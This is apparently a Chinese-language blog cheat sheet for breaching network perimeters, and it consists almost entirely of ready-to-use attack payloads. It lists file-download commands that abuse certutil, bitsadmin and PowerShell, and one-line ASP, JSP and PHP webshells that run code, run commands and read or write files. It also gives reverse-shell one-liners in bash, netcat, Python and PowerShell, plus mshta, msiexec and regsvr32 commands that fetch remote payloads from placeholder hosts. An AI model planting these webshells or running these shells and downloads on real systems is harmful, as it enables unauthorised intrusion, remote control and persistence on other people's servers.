边界突破


漏洞挖掘

文件下载

Http

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000

Curl

curl http://example.com/File -o File

Wget

wget http://example.com/File -O File

Certutil

echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete

Bitsadmin

bitsadmin /transfer job http://example.com/File C:\Users\Public\File

PowerShell

powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))

WebShell

ASP

  • 代码执行
<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>
  • 命令执行
<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd")).stdout.readall %>
<%= Server.CreateObject("Shell.Application").ShellExecute("cmd.exe","/c "&request("cmd"),"","open",0) %>
  • 文件操作
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),1,False).Readall %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),2,True).WriteLine(request("data")) %>

JSP

  • 代码执行
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("code")); %>
<% new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("url"))}).loadClass(request.getParameter("class")).newInstance(); %>
  • 命令执行
<% Runtime.getRuntime().exec(new String[]{"bash","-c",request.getParameter("cmd")}); %>
<% new ProcessBuilder(new String[]{"bash","-c",request.getParameter("cmd")}).start(); %>
  • 文件操作
<% for(java.io.File name:new java.io.File(request.getParameter("dir")).listFiles()){out.println(name+"<br>");} %>
<% new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("file")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("data"))); %>
<%@ page import="java.io.FileInputStream" %><% FileInputStream File=new FileInputStream(application.getRealPath("/")+request.getParameter("file"));int Temp=0;while((Temp=File.read())!=-1){out.print((char)Temp);}File.close(); %>

PHP

  • 代码执行
<?php @eval($_REQUEST['code']); ?>
<?php @assert($_REQUEST['code']); ?>
<?php $main=@create_function('',$_REQUEST['code']);$main(); ?>
<?php @call_user_func($_REQUEST['func'],$_REQUEST['code']); ?>
<?php @array_map($_REQUEST['func'],array($_REQUEST['code'])); ?>
  • 命令执行
<?php @system($_REQUEST['cmd']); ?>
<?php @passthru($_REQUEST['cmd']); ?>
<?php echo @exec($_REQUEST['cmd']); ?>
<?php echo @shell_exec($_REQUEST['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array('-c',$_REQUEST['cmd'])); ?>
<?php $x=@popen($_REQUEST['cmd'], "r");echo stream_get_contents($x);pclose($x); ?>
<?php $x=@proc_open($_REQUEST['cmd'],array(1=>array("pipe","w")),$y);echo stream_get_contents($y[1]);proc_close($x); ?>
  • 文件操作
<?php echo @file_get_contents($_REQUEST['file']); ?>
<?php echo @implode('<br>',scandir($_REQUEST['dir'])); ?>
<?php @file_put_contents($_REQUEST['file'],base64_decode($_REQUEST['data'])); ?>

反弹Shell

TTY

python -c 'import pty; pty.spawn("/bin/bash")'

PHP

php -r '$sock=fsockopen("x.x.x.x",yyyy);exec("/bin/bash -i <&3 >&3 2>&3");'

Bash

bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1

Ncat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc x.x.x.x yyyy >/tmp/f

Mshta

mshta http://example.com/shell.hta

Python

python -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",yyyy));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

Msiexec

msiexec /q /i http://example.com/shell.msi

Regsvr32

regsvr32 /s /n /u /i:http://example.com/shell.sct scrobj.dll

Rundll32

rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("shell");window.close();

PowerShell

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://example.com/shell')"
powershell -nop -c "$TCP=New-Object System.Net.Sockets.TCPClient('x.x.x.x',yyyy);$CMD=$TCP.GetStream();[byte[]]$Bytes = 0..65535|%{0};while(($I=$CMD.Read($Bytes,0,$Bytes.Length)) -ne 0){$Send=[Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$I) 2>&1 | Out-String)+'PS '+(pwd).Path+'> ');$CMD.Write($Send,0,$Send.Length);$CMD.Flush()};$TCP.Close()"

文章作者: DongHuangT1
版权声明: 本博客所有文章除特别声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !